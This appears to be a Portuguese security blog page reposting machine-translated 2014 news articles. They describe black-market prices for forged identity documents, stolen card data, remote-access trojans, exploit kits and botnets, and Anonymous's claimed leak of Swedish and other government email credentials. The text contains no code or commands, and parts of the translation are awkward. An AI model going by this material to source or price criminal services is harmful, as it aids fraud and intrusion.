No mercado subterrâneo, é possível adquirir um cartão de trabalho da segurança social, nome e endereço para US $ 250, pagar outros US $ 100 um scammer pode comprar uma conta de luz para usar em processos de verificação de identidade. Passaportes não-americanos falsificados estão disponíveis para um custo entre US $ 200 a US $ 500. Os especialistas explicaram que é muito difícil encontrar US passaportes, porque a aplicação da lei dos Estados Unidos é acreditado para infiltrar-se na comunidade de hackers, tornando arriscado sua comercialização. Carteiras de motorista falsificada US correr para US $ 100- $ 150, enquanto isso falsificar Segurança Social Cards run entre US $ 250 e US $ 400, em média, em ambos os casos, esses documentos possam ser utilizados para melhorar a eficiência dos esquemas de fraude.

Cartões premium continuam a ser mercadorias preciosas no submundo do crime, uma coleção completa de credenciais roubadas, também conhecidos com o termo hacker slang "fullz", executado por US $ 30 nos EUA, enquanto, em 2013, foi oferecido por US $ 5. O fullz inclui também informações relacionadas com o titular do cartão, como nome, endereço, número de telefone, endereços de email, datas de nascimento, números de segurança social, números de contas bancárias, números de cartões de crédito e dados bancários.

Os pesquisadores notaram que o preço de números de cartão de crédito individuais mantém-se inalterada desde o ano passado, Master Card premium e cartões Visa, incluindo tanto dados de Pista 1 e 2 estão vendendo por US $ 35 e US $ 23, respectivamente.

Outra bem precioso no underground de hackers é o malware, custo para  Trojans de acesso remoto  (ratos) é diminuída relativamente ao ano anterior, e hoje são vendidos por um preço que varia de US $ 20 a US $ 50 para RATOS notórios como  DarkComet . Vários ratos também são oferecidos gratuitamente deflação dos preços. A comunidade subterrânea também oferece populares explorar kits como Nuclear e Sweet Orange para os melhores preços com Laranja Doce em US $ 450 para um contrato de arrendamento semanalmente, para US $ 1.800 para um mês inteiro.

"Os hackers estão procurando por um rato que é facilmente disponível para compra ou para uso gratuito e que eles podem ser executados através de um Crypter (um programa que criptografa malware, tornando-FUD ou completamente indetectável a Anti-Virus e programas anti-malware), ", disse o relatório.

O relatório inclui uma série de dados interessantes relacionados a produtos e serviços oferecidos no botnet pirataria no subsolo, incluindo disponíveis para aluguel e DDoS ataque à demanda.

Em relação ao preço para bots localizados em países específicos, é maior respeito ano anterior e que depende da localização dos computadores infectados.

" Estes  bots aleatórios foram consideravelmente mais barato, por exemplo, 1.000 bots correu US $ 20; 5.000 bots correu  $ 90; 10.000 correu US $ 160; etc.  No entanto, este ano eles encontraram preços para bots localizados em países específicos, e esses bots  são consideravelmente mais caros. O preço para a compra de acesso a computadores comprometidos  que pode variar de país para país. O preço para 5.000 bots individuais localizados em os EUA  vai de US $ 600 a US $ 1.000, enquanto o mesmo número de bots baseadas no Reino Unido custa US $ 400 a US $ 500, um  decréscimo de 50 a 100 por cento no preço dos bots dos EUA ".

Não perca tempo ... dá uma olhada para relatar!

Pierluigi Paganini

( Assuntos de Segurança  - Hacking subterrâneo, o cibercrime)

quinta-feira, 18 de dezembro de 2014

Governo Sueco invadido

Os membros do grupo Anonymous alegam ter invadido várias contas de email governo sueco sobre a apreensão dos servidores do Pirate Bay.

Muitos especialistas em segurança cibernética consideram hacktivistas como uma ameaça que está fervilhando, mas é a minha opinião, é um erro grave subestimar suas capacidades e da Stratfor  caso é provavelmente a demonstração mais evidente do seu impacto.

Desta vez, a vítima do ataque é o governo sueco, o Anonymous, invadiu contas de e-mail dos representantes do governo em resposta à recente apreensão de servidores do The Pirate Bay website pelas sm autoridades suecas.

Os membros do Anonymous também alegou ter violado as contas de email de muitos outros governos, divulgando suas credenciais online, incluindo Índia, Brasil, Argentina, Brasil, Índia, Israel e México.

Na época, eu estou escrevendo, não há notícias sobre o suposto ataque ao e-mail contas de funcionários do governo. Não está claro quais são os sistemas segmentados por Anonymous e como os hackers obtiveram as suas credenciais.

O grupo Anonymous acrescentou a seguinte mensagem para a coleção de credenciais vazaram on-line:

"Aviso: Feliz Natal e um Feliz Ano Novo a todos !! Tchau: * "

A mensagem que contém a lista das credenciais foi postada no Pastebin.com, mas já foi removido, Anonymous também anunciou o corte através de um de sua conta oficial no Twitter.

Anonymous hackeado Governo sueco Pirate Bay
"QUEBRANDO: Emails do governo sueco foram cortados em retaliação a apreensão dos servidores do The Pirate Bay http://pastebin.com/cxmiUSJD", diz o tweet.

Após a apreensão do The Pirate Bay, hackers atacaram várias organizações suecas. A agência de notícias local informou que na semana passada que empresa de internet sueco, Telia, sofreu um grande ataque DDoS que afetou seus serviços on-line e conexões de usuários.

"O alto perfil que corta o ataque na internet gigante sueca Telia tem sido associada a uma batida policial no Pirate Bay, o que dizem os especialistas" sentimentos provocou "entre os hackers.", Afirma o Local. "David Jacoby, pesquisador-chefe da empresa de segurança de dados da Kaspersky Lab disse que o ataque provavelmente deriva de uma batida policial no início desta semana contra o compartilhamento de arquivos Pirate Bay, em Estocolmo. "

O Lizard Plantel equipe de hackers reivindicou a responsabilidade pelo ataque, o grupo também corre nas últimas semanas grandes ataques DDoS contra a rede on-line Xbox eo PlayStation Network causando interrupções significativas dos serviços. Jacoby explicou que o Lizard Squad é um dos muitos grupos de hackers envolvidos no movimento anônimo Pirate Bay.

"Estes ataques não vêm do nada. O ataque Pirate Bay tem provocado sentimentos nesses grupos ", Jacoby à agência de notícias TT.

Na terça-feira, o The Pirate Bay e muitos outros sites de torrent foram temporariamente inacessível devido ao assalto da polícia sueca contra a sua infra-estrutura.

The Pirate Bay foi de novo no dia seguinte, hospedado em um domínio na Costa Rica, mas os usuários notou algo de estranho no website.

"No entanto, os usuários de torrent notaram que os downloads eram nem devidamente funcionando, nem foram de cortesia, e veio com ofertas incomuns de um serviço VIP. Alguns disseram que o site da .cr poderia ter sido um velho espelho TPB gerido por um grupo diferente de pessoas, enquanto outros se refere a ela como uma farsa. " informou o site da rt.com .

Em setembro, os membros do The Pirate Bay alegou que o popular site é apoiado por  21 máquinas virtuais "à prova de RAID"  que o tornam resistente às ações operadas pela aplicação da lei.

Fique ligado para mais informações ....

Pierluigi Paganini

( Assuntos de Segurança  - The Pirate Bay,

terça-feira, 16 de dezembro de 2014

Espionagem

http://securityaffairs.co/wordpress/31109/intelligence/stingray-used-spy-norway-politicians.html

EM 2026, CIBERSEGURANÇA DEIXOU DE SER UM PROBLEMA TÉCNICO A transição da defesa tática para a liderança estratégica em infraestruturas crít...